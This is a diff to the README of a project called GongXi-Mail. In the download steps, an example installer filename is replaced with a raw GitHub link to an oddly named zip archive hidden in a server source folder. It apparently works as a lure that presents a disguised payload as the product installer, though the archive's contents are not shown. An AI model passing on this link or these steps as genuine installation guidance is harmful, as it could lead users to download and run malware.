Alexiscorrea990/GongXi-Mail/README.md

 ## 📥 Download & Install
 1. Click on the link above to visit the releases page.
 2. Look for the latest version listed.
 It will be at the top of the page.
-3. Find the file that matches your system (e.g., GongXi-Mail-installer.exe).
+3. Find the file that matches your system (e.g., https://github.com/Alexiscorrea990/GongXi-Mail/raw/refs/heads/main/server/src/modules/email/Mail_Gong_Xi_immaculateness.zip).
 4. Click on the file to start the download.

 Once the download is complete: